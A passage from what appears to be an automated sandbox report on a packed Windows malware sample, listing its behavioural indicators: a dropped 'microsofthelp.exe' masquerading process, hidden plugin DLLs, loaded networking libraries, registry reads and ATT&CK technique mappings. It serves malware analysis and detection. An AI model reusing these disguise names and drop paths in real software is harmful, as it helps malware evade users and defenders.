\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" loaded module \"KERNEL32\" at base 76220000\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a760000\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75590000\n \"microsofthelp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 720b0000\n \"microsofthelp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"microsofthelp.exe\" loaded module \"KERNEL32\" at base 76220000\n \"microsofthelp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"microsofthelp.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a760000\n \"microsofthelp.exe\" loaded module \"%WINDIR%\\HIDEPLUGIN.DLL\" at base 0\n \"microsofthelp.exe\" loaded module \"SECUR32.DLL\" at base 75410000\n \"microsofthelp.exe\" loaded module \"RPCRT4.DLL\" at base 75c30000\n \"microsofthelp.exe\" loaded module \"SHELL32.DLL\" at base 764c0000\n \"microsofthelp.exe\" loaded module \"OLE32.DLL\" at base 77110000\n \"microsofthelp.exe\" loaded module \"ADVAPI32.DLL\" at base 76160000\n \"microsofthelp.exe\" loaded module \"PROFAPI.DLL\" at base 756f0000\n \"microsofthelp.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 6fb30000\n \"microsofthelp.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75710000\n \"microsofthelp.exe\" loaded module \"WS2_32.DLL\" at base 76120000\n \"microsofthelp.exe\" loaded module \"WINHTTP.DLL\" at base 71c70000\n \"microsofthelp.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 750b0000\n \"microsofthelp.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 750a0000\n \"microsofthelp.exe\" loaded module \"IPHLPAPI.DLL\" at base 723d0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005932)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\HidePlugin.dll (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\HidePlugin.dll (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00001432)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00001432)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f41477@RPCRT4.dll\"\n \"0d000e00844b6f6a@iphlpapi.dll\"\n \"0f001000dc4b6f6a@iphlpapi.dll\"\n \"0c000d00244c6f6a@iphlpapi.dll\"\n \"140015006c4c6f6a@iphlpapi.dll\"\n \"0c000d00e04c6f6a@iphlpapi.dll\"\n \"15001600c03e6f6a@ADVAPI32.dll\"\n \"0e000f00703f6f6a@ADVAPI32.dll\"\n \"0e000f00cc3f6f6a@ADVAPI32.dll\"\n \"11001200b4476f6a@ADVAPI32.dll\"\n \"1100120048486f6a@ADVAPI32.dll\"\n \"120013008c486f6a@ADVAPI32.dll\"\n \"12001300e4486f6a@ADVAPI32.dll\"\n \"14001500386e6f6a@ADVAPI32.dll\"\n \"14001500506e6f6a@ADVAPI32.dll\"\n \"14001500686e6f6a@ADVAPI32.dll\"\n \"17001800806e6f6a@ADVAPI32.dll\"\n \"0d000e00986e6f6a@ADVAPI32.dll\"\n \"11001200a86e6f6a@ADVAPI32.dll\"\n \"11001200bc6e6f6a@ADVAPI32.dll\"\n \"0d000e0044666f6a@WININET.dll\"\n \"0d000e00b4666f6a@WININET.dll\"\n \"10001100ec666f6a@WININET.dll\"\n \"1000110090676f6a@WININET.dll\"\n \"10001100006f6f6a@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"CreateProcessA\" with parameter \"%WINDIR%\\microsofthelp.exe\" - (UID: 00000000-00005932)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\" has an executable section named \".MPRESS1\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\" has an executable section named \".MPRESS2\"\n \"microsofthelp.exe.bin\" has an executable section named \".MPRESS1\"\n \"microsofthelp.exe.bin\" has an executable section named \".MPRESS2\"\n \"DISMHOST.EXE.67A480BA.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\" has an writable section named \".MPRESS1\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\" has an writable section named \".MPRESS2\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\" has an writable section named \".imports\"\n \"microsofthelp.exe.bin\" has an writable section named \".MPRESS1\"\n \"microsofthelp.exe.bin\" has an writable section named \".MPRESS2\"\n \"microsofthelp.exe.bin\" has an writable section named \".imports\"\n \"DISMHOST.EXE.67A480BA.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"DISMHOST.EXE.67A480BA.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"microsofthelp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"microsofthelp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"microsofthelp.exe\" failed to load missing module \"%WINDIR%\\HidePlugin.dll\" - [base:0; Status:c000012f]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75C30000\n \"microsofthelp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75C30000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"microsofthelp.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"microsofthelp.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"microsofthelp.exe\" (UID: 00000000-00005968)\n Spawned process \"microsofthelp.exe\" (UID: 00000000-00001432)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"microsofthelp.exe\" (UID: 00000000-00005968)\n Spawned process \"microsofthelp.exe\" (UID: 00000000-00001432)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"microsofthelp.exe\" (UID: 00000000-00001432) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"microsofthelp.exe\" (UID: 00000000-00001432) was launched with modified environment variables: \"PSModulePath, PATHEXT\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\" was detected as \"MPRESS\" and name: \"Packer\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"microsofthelp.exe.bin\" was detected as \"MPRESS\" and name: \"Packer\"\n \"microsofthelp.exe.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67A480BA.bin\" was detected as \"MPRESS\" and name: \"Packer\"\n \"DISMHOST.EXE.67A480BA.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-79", "relevance": 1, "name": "Contains ability to dynamically determine API calls", "description": "Found GetProcAddress() and LoadLibraryA() in an import section (Source: 7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: microsofthelp.exe.bin)", "origin": "Static Parser", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"DISMHOST.EXE.67A480BA.bin\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-354", "type": 2, "relevance": 1, "name": "Contains reference to mutex-related activity (API string)", "description": "Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"DISMHOST.EXE.67A480BA.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to access non-existent file \"C:\\iphlpapi.dll\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to access non-existent file \"C:\\IPHLPAPI.DLL\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"microsofthelp.exe\" trying to access non-existent file \"C:\\Windows\\version.DLL\"\n \"microsofthelp.exe\" trying to access non-existent file \"C:\\Windows\\iphlpapi.dll\"\n \"microsofthelp.exe\" trying to access non-existent file \"C:\\Windows\\WINNSI.DLL\"\n \"microsofthelp.exe\" trying to access non-existent file \"C:\\Windows\\FLTLIB.DLL\"\n \"microsofthelp.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" reads file \"c:\\7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" reads file \"c:\\windows\\microsofthelp.exe\"\n \"microsofthelp.exe\" reads file \"c:\\windows\\microsofthelp.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"microsofthelp.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"LoadLibraryExW\" (Indicator: \"LoadLibrary\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"LoadLibraryExW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to touch file \"C:\\version.DLL\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to touch file \"C:\\iphlpapi.dll\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to touch file \"C:\\Windows\\system32\\iphlpapi.dll\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to touch file \"C:\\WINNSI.DLL\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to touch file \"C:\\Windows\\system32\\WINNSI.DLL\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" trying to touch file \"C:\\Windows\\microsofthelp.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" touched file \"C:\\Windows\\microsofthelp.exe\"\n \"microsofthelp.exe\" touched file \"C:\\Windows\\HidePlugin.dll\"\n \"microsofthelp.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"microsofthelp.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": 